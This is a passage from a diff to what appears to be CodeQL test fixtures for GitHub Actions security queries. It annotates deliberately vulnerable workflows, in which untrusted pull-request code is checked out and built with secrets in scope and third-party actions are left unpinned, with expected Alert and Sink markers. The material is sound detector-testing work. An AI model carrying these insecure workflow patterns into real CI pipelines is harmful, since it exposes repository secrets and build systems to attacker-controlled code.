vars.AGENT_TYPE }} - - name: Upload coverage reports to Codecov - uses: codecov/codecov-action@v3 + - name: Upload coverage reports to Codecov # $ Sink[actions/untrusted-checkout/critical] + uses: codecov/codecov-action@v3 # $ Alert[actions/unpinned-tag] - name: Stage new files and commit id: stage_files @@ -108,7 +108,7 @@ jobs: - name: Create PR id: create_pr if: ${{ env.TIMESTAMP_COMMIT != null }} - uses: peter-evans/create-pull-request@v5 + uses: peter-evans/create-pull-request@v5 # $ Alert[actions/unpinned-tag] with: commit-message: Update cassettes branch: cassette-diff-PR-${{ github.event.pull_request.number }}-${{ env.TIMESTAMP_COMMIT }} @@ -124,7 +124,7 @@ jobs: - name: Comment PR URL in the current PR if: ${{ env.TIMESTAMP_COMMIT != null }} - uses: thollander/actions-comment-pull-request@v2 + uses: thollander/actions-comment-pull-request@v2 # $ Alert[actions/unpinned-tag] with: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} message: | diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml index 072eae4b1d2a..a905b6b9d668 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml @@ -35,7 +35,7 @@ jobs: ref: ${{ github.event.pull_request.head.ref }} token: ${{ secrets.DEPENDABOT_AUTOBUILD }} - - name: Read .nvmrc + - name: Read .nvmrc # $ Alert[actions/untrusted-checkout/medium] id: nvm run: echo "NVMRC=$(cat .nvmrc)" >> $GITHUB_OUTPUT diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot3.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot3.yml index 1bda517c9a12..308cc9fde518 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot3.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot3.yml @@ -17,7 +17,7 @@ jobs: show-progress: false ref: ${{ github.event.pull_request.head.sha }} - - uses: actions/setup-java@v4 + - uses: actions/setup-java@v4 # $ Alert[actions/untrusted-checkout/critical] with: distribution: temurin java-version: 17 @@ -45,7 +45,7 @@ jobs: env: GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} - - name: Merge Dependabot pull request + - name: Merge Dependabot pull request # $ Sink[actions/untrusted-checkout/critical] if: steps.set-milestone.outputs.mergeEnabled run: gh pr merge ${{ github.event.pull_request.number }} --auto --rebase env: diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml index 3b8a6d6dd62a..b338fbc5f16b 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml @@ -23,7 +23,7 @@ jobs: - uses: actions/checkout@v2 with: ref: ${{ inputs.branch }} - - run: | + - run: | # $ Alert[actions/untrusted-checkout/critical] npm install npm run lint - + # $ Sink[actions/untrusted-checkout/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml index ab121239c6e1..f34f96996c50 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml @@ -15,9 +15,9 @@ jobs: git merge --no-commit --no-edit origin/$HEAD_BRANCH env: HEAD_BRANCH: ${{ github.head_ref }} - - uses: actions/setup-node@v1 + - uses: actions/setup-node@v1 # $ Alert[actions/untrusted-checkout/critical] # 2. Potentially untrusted commands are being run during "npm install" or "npm build" as # the build scripts and referenced packages are controlled by the author of the pull request - run: | npm install - npm build + npm build # $ Sink[actions/untrusted-checkout/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml index 221854ec2042..984c56d9028d 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml @@ -11,7 +11,7 @@ jobs: steps: - name: (PR comment) Get PR branch if: ${{ github.event_name == 'issue_comment' }} - uses: xt0rted/pull-request-comment-branch@v2 + uses: xt0rted/pull-request-comment-branch@v2 # $ Alert[actions/unpinned-tag] id: comment-branch - name: (PR comment) Checkout PR branch if: ${{ github.event_name == 'issue_comment' }} @@ -24,7 +24,7 @@ jobs: steps: - name: (PR comment) Get PR branch if: ${{ github.event_name == 'issue_comment' }} - uses: xt0rted/pull-request-comment-branch@v2 + uses: xt0rted/pull-request-comment-branch@v2 # $ Alert[actions/unpinned-tag] id: comment-branch - name: (PR comment) Checkout PR branch @@ -38,7 +38,7 @@ jobs: steps: - name: resolve pr refs id: refs - uses: eficode/resolve-pr-refs@main + uses: eficode/resolve-pr-refs@main # $ Alert[actions/unpinned-tag] with: token: ${{ secrets.GITHUB_TOKEN }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml index ece4c02c3565..133d033a4e9e 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml @@ -13,7 +13,7 @@ jobs: uses: actions/checkout@v4 with: ref: ${{ github.event.pull_request.head.ref || github.head_ref }} # Checkout the branch that made the PR or the comment's PR branch - test2: + test2: # $ Alert[actions/untrusted-checkout/high] runs-on: ubuntu-latest if: github.event.issue.pull_request && github.event.comment.body == '/trigger release' steps: @@ -21,7 +21,7 @@ jobs: with: ref: refs/pull/${{ github.event.issue.number }}/merge - test3: + test3: # $ Alert[actions/untrusted-checkout/high] runs-on: ubuntu-latest if: github.event.issue.pull_request && github.event.comment.body == '/trigger release' steps: @@ -29,7 +29,7 @@ jobs: with: ref: ${{ format('refs/pull/{0}/merge', github.event.issue.number) }} - test4: + test4: # $ Alert[actions/untrusted-checkout/high] runs-on: ubuntu-latest steps: - name: Checkout Branch @@ -37,10 +37,10 @@ jobs: with: ref: ${{ (github.event_name == 'pull_request_review_comment') && format('refs/pull/{0}/merge', github.event.pull_request.number) || '' }} - test5: + test5: # $ Alert[actions/untrusted-checkout/high] runs-on: ubuntu-latest steps: - name: Checkout Branch uses: actions/checkout@v4 with: - ref: ${{ github.event_name == 'issue_comment' && format('refs/pull/{0}/merge', github.event.issue.number) || '' }} + ref: ${{ github.event_name == 'issue_comment' && format('refs/pull/{0}/merge', github.event.issue.number) || '' }} # $ Alert[actions/untrusted-checkout/high] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml index 8c0865f598cd..6dd5205c08e3 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml @@ -30,7 +30,7 @@ jobs: with: ref: ${{ steps.get-sha.outputs.sha }} - test2: + test2: # $ Alert[actions/untrusted-checkout/high] runs-on: ubuntu-latest steps: @@ -47,4 +47,4 @@ jobs: echo "branch=$REF" >> $GITHUB_OUTPUT - uses: actions/checkout@v4 with: - ref: ${{ steps.vars.outputs.branch }} + ref: ${{ steps.vars.outputs.branch }} # $ Alert[actions/untrusted-checkout/high] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml index ac013eb6e2f9..b25d53c739ee 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml @@ -27,12 +27,12 @@ jobs: with: ref: ${{ fromJson(steps.fetch_pr.outputs.data).head.ref }} token: ${{ secrets.GITHUB_TOKEN }} - - uses: actions/checkout@v4 + - uses: actions/checkout@v4 # $ Alert[actions/untrusted-checkout/high] with: ref: ${{ fromJson(steps.fetch_pr.outputs.data).head.sha }} token: ${{ secrets.GITHUB_TOKEN }} - test2: + test2: # $ Alert[actions/untrusted-checkout/high] runs-on: ubuntu-latest steps: - name: Get Info from comment @@ -59,7 +59,7 @@ jobs: with: ref: ${{ steps.get-sha.outputs.sha }} - test3: + test3: # $ Alert[actions/untrusted-checkout/high] if: github.event.comment.body == '@excalibot trigger release' && github.event.issue.pull_request runs-on: ubuntu-latest steps: @@ -80,7 +80,7 @@ jobs: with: ref: ${{ steps.sha.outputs.result }} - test4: + test4: # $ Alert[actions/untrusted-checkout/high] if: github.event.issue.pull_request && contains(github.event.comment.body, '!bench_parser') runs-on: ubuntu-latest steps: @@ -97,7 +97,7 @@ jobs: with: ref: ${{ steps.sha.outputs.result }} - test5: + test5: # $ Alert[actions/untrusted-checkout/high] runs-on: ubuntu-20.04 steps: - id: request @@ -111,4 +111,4 @@ jobs: with: token: ${{ secrets.GITHUB_TOKEN }} repository: ${{fromJson(steps.request.outputs.data).head.repo.full_name}} - ref: ${{fromJson(steps.request.outputs.data).head.ref}} + ref: ${{fromJson(steps.request.outputs.data).head.ref}} # $ Alert[actions/untrusted-checkout/high] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml index 8485ad0ed671..0831bc9217cb 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml @@ -23,15 +23,15 @@ jobs: route: GET ${{ fromJson(steps.fetch_issue.outputs.data).pull_request.url }} env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - - name: Checkout PR minor patch wildcard + - name: Checkout PR minor patch wildcard # $ Alert[actions/unversioned-immutable-action] - uses: actions/checkout@v2.x.xx with: ref: ${{ fromJson(steps.fetch_pr.outputs.data).head.ref }} token: ${{ secrets.GITHUB_TOKEN }} - - name: Checkout PR minor wildcard incomplete patch + - name: Checkout PR minor wildcard incomplete patch # $ Alert[actions/untrusted-checkout/high] Alert[actions/unversioned-immutable-action] uses: actions/checkout@v2.x. - - name: Run latest action - uses: some-action/some-repo@latest + - name: Run latest action # $ Alert[actions/unversioned-immutable-action] + uses: some-action/some-repo@latest # $ Alert[actions/unpinned-tag] with: some-input: some-value - name: run the latest checkout action diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout1.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout1.yml index 56bb143cf367..32cef70963ae 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout1.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout1.yml @@ -17,11 +17,11 @@ jobs: npm install npm build - - uses: completely/fakeaction@v2 + - uses: completely/fakeaction@v2 # $ Alert[actions/unpinned-tag] with: arg1: ${{ secrets.supersecret }} - - uses: fakerepo/comment-on-pr@v1 + - uses: fakerepo/comment-on-pr@v1 # $ Alert[actions/unpinned-tag] with: message: | Thank you! diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml index 6014d08ed806..fef28af7925d 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml @@ -13,16 +13,16 @@ jobs: with: ref: ${{ github.event.pull_request.head.sha }} - - uses: actions/setup-node@v1 + - uses: actions/setup-node@v1 # $ Alert[actions/untrusted-checkout/critical] - run: | npm install npm build - - uses: completely/fakeaction@v2 + - uses: completely/fakeaction@v2 # $ Alert[actions/unpinned-tag] Sink[actions/untrusted-checkout/critical] with: arg1: ${{ secrets.supersecret }} - - uses: fakerepo/comment-on-pr@v1 + - uses: fakerepo/comment-on-pr@v1 # $ Alert[actions/unpinned-tag] with: message: | Thank you! diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/level0.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/level0.yml index 49908b7b4c51..47aa7725a812 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/level0.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/level0.yml @@ -33,7 +33,7 @@ jobs: - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 with: egress-policy: audit - - uses: rlespinasse/github-slug-action@v4 + - uses: rlespinasse/github-slug-action@v4 # $ Alert[actions/unpinned-tag] with: short-length: 8 - name: Check for profanities in issue body @@ -100,7 +100,7 @@ jobs: uses: actions/checkout@v4 with: ref: ${{ github.event.pull_request.head.sha }} - - name: Setup Node.js + - name: Setup Node.js # $ Alert[actions/untrusted-checkout/critical] uses: actions/setup-node@v4 with: node-version: 21 @@ -109,7 +109,7 @@ jobs: npm run lint npm start - toppings: + toppings: # $ Sink[actions/untrusted-checkout/critical] runs-on: ubuntu-latest timeout-minutes: 1 if: github.event_name == 'pull_request' @@ -126,11 +126,11 @@ jobs: uses: actions/checkout@v4 with: ref: ${{ github.event.pull_request.head.sha }} - - name: Setup Node.js + - name: Setup Node.js # $ Alert[actions/untrusted-checkout/critical] uses: actions/setup-node@v4 with: node-version: 21 - run: | npm install - npm run lint + npm run lint # $ Sink[actions/untrusted-checkout/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/mend.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/mend.yml index b539c562084e..dbeeb1e0eebc 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/mend.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/mend.yml @@ -26,8 +26,8 @@ jobs: fetch-depth: 1 ref: ${{ steps.set_ref.outputs.ref }} - - name: "setup ruby" + - name: "setup ruby" # $ Alert[actions/untrusted-checkout/medium] if: success() - uses: "ruby/setup-ruby@v1" + uses: "ruby/setup-ruby@v1" # $ Alert[actions/unpinned-tag] with: ruby-version: 2.7 diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc.yml index 6900c3bc23fa..4035b3fb4643 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc.yml @@ -33,9 +33,9 @@ jobs: # For PRs make sure to checkout the PR branch ref: ${{ github.event.pull_request.head.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - name: Setup Pages + - name: Setup Pages # $ Alert[actions/untrusted-checkout/medium] Alert[actions/unversioned-immutable-action] uses: actions/configure-pages@983d7736d9b0ae728b81ab479565c72886d7745b # v5 - - name: Build with Jekyll + - name: Build with Jekyll # $ Alert[actions/unversioned-immutable-action] uses: actions/jekyll-build-pages@b178f9334b208360999a0a57b523613563698c66 # v1 with: source: ./ @@ -44,7 +44,7 @@ jobs: # Automatically uploads an artifact from the './_site' directory by default uses: actions/upload-pages-artifact@56afc609e74202658d3ffba0e8f6dda462b719fa # v3 # Deployment job - deploy: + deploy: # $ Alert[actions/unversioned-immutable-action] environment: name: 'Pages Preview' url: ${{ steps.deployment.outputs.page_url }} @@ -60,4 +60,4 @@ jobs: id: deployment uses: actions/deploy-pages@d6db90164ac5ed86f2b6aed7e0febac5b3c0c03e # v4 with: - preview: 'true' + preview: 'true' # $ Alert[actions/unversioned-immutable-action] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml index 5501beb9ea2f..9ecc8c2367bb 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml @@ -39,12 +39,12 @@ jobs: with: ref: ${{ steps.branch-deploy.outputs.ref }} - - uses: ruby/setup-ruby@d4526a55538b775af234ba4af27118ed6f8f6677 # pin@v1.172.0 + - uses: ruby/setup-ruby@d4526a55538b775af234ba4af27118ed6f8f6677 # pin@v1.172.0 # $ Alert[actions/untrusted-checkout/critical] if: ${{ steps.branch-deploy.outputs.continue == 'true' }} with: bundler-cache: true - - name: bootstrap + - name: bootstrap # $ Sink[actions/untrusted-checkout/critical] if: ${{ steps.branch-deploy.outputs.continue == 'true' }} run: script/bootstrap @@ -55,4 +55,4 @@ jobs: set -o pipefail script/deploy | tee deploy.out bundle exec ruby script/ci/render_deploy_message.rb - rm deploy.out + rm deploy.out # $ Sink[actions/untrusted-checkout/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml index 4d5ae1f528cd..39fc63beb3f9 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml @@ -22,7 +22,7 @@ jobs: ref: ${{ github.event.pull_request.head.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - name: Checkout + - name: Checkout # $ Alert[actions/untrusted-checkout/medium] if: ${{ github.event_name != 'pull_request_target' }} uses: actions/checkout@v3 with: diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml index 061ff7d02c5e..a89f4ef3031f 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml @@ -57,7 +57,7 @@ jobs: - name: checkout uses: actions/checkout@v3 if: ${{ inputs.github_event_name != 'merge_group' && inputs.github_event_name != 'push' }} - - uses: amannn/action-semantic-pull-request@v5 + - uses: amannn/action-semantic-pull-request@v5 # $ Alert[actions/unpinned-tag] if: ${{ inputs.github_event_name != 'merge_group' && inputs.github_event_name != 'push' }} with: requireScope: false @@ -106,7 +106,7 @@ jobs: persist-credentials: false submodules: false lfs: true - - uses: actionsdesk/lfs-warning@v3.2 + - uses: actionsdesk/lfs-warning@v3.2 # $ Alert[actions/unpinned-tag] Alert[actions/untrusted-checkout/high] name: lfs-warning with: labelName: lfs-detected! @@ -141,11 +141,11 @@ jobs: lfs: true ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} persist-credentials: false - - uses: cachix/install-nix-action@v20 + - uses: cachix/install-nix-action@v20 # $ Alert[actions/unpinned-tag] Alert[actions/untrusted-checkout/high] with: nix_path: nixpkgs=channel:nixos-unstable - - uses: DeterminateSystems/magic-nix-cache-action@main - - uses: cachix/cachix-action@master + - uses: DeterminateSystems/magic-nix-cache-action@main # $ Alert[actions/unpinned-tag] + - uses: cachix/cachix-action@master # $ Alert[actions/unpinned-tag] with: authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}" name: composable @@ -219,12 +219,12 @@ jobs: lfs: true ref: ${{ inputs.github_event_pull_request_head_sha }} persist-credentials: false - - name: Build all packages + - name: Build all packages # $ Alert[actions/untrusted-checkout/critical] if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' }} uses: "./.github/templates/watch-exec" with: command: nix -- build .#all-outputs - - id: ok + - id: ok # $ Sink[actions/untrusted-checkout/critical] run: echo "ok=true" >> "$GITHUB_OUTPUT" build-all-checks-packages: @@ -253,12 +253,12 @@ jobs: lfs: true ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} persist-credentials: false - - name: Build all packages + - name: Build all packages # $ Alert[actions/untrusted-checkout/critical] if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' }} uses: "./.github/templates/watch-exec" with: command: nix -- build .#all-checks - - id: ok + - id: ok # $ Sink[actions/untrusted-checkout/critical] run: echo "ok=true" >> "$GITHUB_OUTPUT" @@ -287,12 +287,12 @@ jobs: lfs: true ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} persist-credentials: false - - name: build-all-deps-packages + - name: build-all-deps-packages # $ Alert[actions/untrusted-checkout/critical] if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' || inputs.flow == 'pr_from_fork' }} uses: "./.github/templates/watch-exec" with: command: nix -- build .#all-deps - - id: ok + - id: ok # $ Sink[actions/untrusted-checkout/critical] run: echo "ok=true" >> "$GITHUB_OUTPUT" draft-release-check: @@ -344,7 +344,7 @@ jobs: with: fetch-depth: 0 - name: Login to DockerHub - uses: docker/login-action@v2 + uses: docker/login-action@v2 # $ Alert[actions/unpinned-tag] with: username: ${{ secrets.DOCKER_HUB_USERNAME }} password: ${{ secrets.DOCKER_HUB_ACCESS_TOKEN }} @@ -353,7 +353,7 @@ jobs: nix run .#generate-release-artifacts --print-build-logs - name: Release artifacts - uses: softprops/action-gh-release@v1 + uses: softprops/action-gh-release@v1 # $ Alert[actions/unpinned-tag] with: draft: true prerelease: false @@ -388,11 +388,11 @@ jobs: lfs: true ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} persist-credentials: false - - name: Build all packages + - name: Build all packages # $ Alert[actions/untrusted-checkout/critical] uses: "./.github/templates/watch-exec" with: command: nix -- build .#all - - name: Publish cmc-api to docker hub + - name: Publish cmc-api to docker hub # $ Sink[actions/untrusted-checkout/critical] uses: "./.github/templates/docker-publish" with: image_path: result/docker-image-cmc-api.tar.gz @@ -401,7 +401,7 @@ jobs: name: cmc-api artifact: cmc-api:latest - - name: Publish devnet-xc to docker hub + - name: Publish devnet-xc to docker hub # $ Sink[actions/untrusted-checkout/critical] uses: "./.github/templates/docker-publish" with: image_path: result/docker-image-devnet-xc.tar.gz @@ -411,7 +411,7 @@ jobs: artifact: devnet-xc:latest tag: ${{ inputs.github_event_name == 'push' && 'main' || ''}} - - name: Publish hyperspace-composable-rococo-picasso-rococo to docker hub + - name: Publish hyperspace-composable-rococo-picasso-rococo to docker hub # $ Sink[actions/untrusted-checkout/critical] uses: "./.github/templates/docker-publish" with: image_path: result/hyperspace-composable-rococo-picasso-rococo.tar.gz @@ -420,7 +420,7 @@ jobs: name: hyperspace-composable-rococo-picasso-rococo artifact: hyperspace-composable-rococo-picasso-rococo:latest - - name: Publish hyperspace-composable-polkadot-picasso-kusama to docker hub + - name: Publish hyperspace-composable-polkadot-picasso-kusama to docker hub # $ Sink[actions/untrusted-checkout/critical] uses: "./.github/templates/docker-publish" with: image_path: result/hyperspace-composable-polkadot-picasso-kusama.tar.gz @@ -429,7 +429,7 @@ jobs: name: hyperspace-composable-polkadot-picasso-kusama artifact: hyperspace-composable-polkadot-picasso-kusama:latest - mantis-e2e: + mantis-e2e: # $ Sink[actions/untrusted-checkout/critical] name: mantis-e2e outputs: ok: ${{ steps.ok.outputs.ok }} @@ -446,11 +446,11 @@ jobs: lfs: true ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} persist-credentials: false - - uses: cachix/install-nix-action@v20 + - uses: cachix/install-nix-action@v20 # $ Alert[actions/unpinned-tag] Alert[actions/untrusted-checkout/high] with: nix_path: nixpkgs=channel:nixos-unstable - - uses: DeterminateSystems/magic-nix-cache-action@main - - uses: cachix/cachix-action@master + - uses: DeterminateSystems/magic-nix-cache-action@main # $ Alert[actions/unpinned-tag] + - uses: cachix/cachix-action@master # $ Alert[actions/unpinned-tag] with: authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}" name: composable diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml index d8381176fd23..54f740735e25 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml @@ -17,7 +17,7 @@ jobs: ref: ${{ github.head_ref }} token: ${{ secrets.DOCUBOT_REPO_PAT }} - - run: | + - run: | # $ Alert[actions/untrusted-checkout/medium] Alert[actions/unversioned-immutable-action] ./cmd env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml index 72db8c29370d..407659f09db5 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml @@ -17,7 +17,7 @@ jobs: GIT_REF: ${{ steps.resolve-step.outputs.GIT_REF }} steps: - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 - - if: github.event_name == 'workflow_run' + - if: github.event_name == 'workflow_run' # $ Alert[actions/unversioned-immutable-action] uses: ./.github/actions/download-artifact - id: resolve-step env: diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml index 3b8a6d6dd62a..b338fbc5f16b 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml @@ -23,7 +23,7 @@ jobs: - uses: actions/checkout@v2 with: ref: ${{ inputs.branch }} - - run: | + - run: | # $ Alert[actions/untrusted-checkout/critical] npm install npm run lint - + # $ Sink[actions/untrusted-checkout/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test10.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test10.yml index e8b5466f7516..8bdb8fc75ede 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test10.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test10.yml @@ -22,12 +22,12 @@ jobs: with: ref: ${{ github.event.after || github.event.pull_request.head.sha }} - - name: Build + - name: Build # $ Alert[actions/untrusted-checkout/critical] working-directory: custom-payment-flow/client/android-kotlin run: | ./gradlew build - dependabot-auto-merge: + dependabot-auto-merge: # $ Sink[actions/untrusted-checkout/critical] if: ${{ github.event.pull_request && github.actor == 'dependabot[bot]' }} needs: android_build permissions: diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test11.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test11.yml index 16bb6bf876c3..448654fe45d8 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test11.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test11.yml @@ -87,8 +87,8 @@ jobs: with: ref: ${{ steps.environment.outputs.head_sha }} - - name: Environment setup + - name: Environment setup # $ Alert[actions/untrusted-checkout/critical] Alert[actions/unversioned-immutable-action] uses: ./.github/actions/setup-env with: - azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} # $ Sink[actions/untrusted-checkout/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test12.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test12.yml index 878b83779613..9f0ee5cf96d9 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test12.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test12.yml @@ -89,7 +89,7 @@ jobs: with: ref: ${{ steps.environment.outputs.head_sha }} - - name: Environment setup + - name: Environment setup # $ Alert[actions/unversioned-immutable-action] uses: ./.github/actions/setup-env with: azure_creds: ${{ secrets.AZURE_CREDENTIALS }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test13.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test13.yml index 0a73e86d5fc6..c8a68d73e588 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test13.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test13.yml @@ -12,7 +12,7 @@ jobs: runs-on: ubuntu-latest steps: - name: Check repository permission for user - uses: sushichop/action-repository-permission@v2 + uses: sushichop/action-repository-permission@v2 # $ Alert[actions/unpinned-tag] with: required-permission: write reaction-permitted: rocket @@ -22,7 +22,7 @@ jobs: with: ref: refs/pull/${{ github.event.issue.number }}/head fetch-depth: 0 - - uses: actions/setup-node@v3 + - uses: actions/setup-node@v3 # $ Alert[actions/untrusted-checkout/high] with: node-version: 16 - name: Danger JS diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test14.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test14.yml index 6f03a0e966a1..15ab46cc70a1 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test14.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test14.yml @@ -102,13 +102,13 @@ jobs: if: 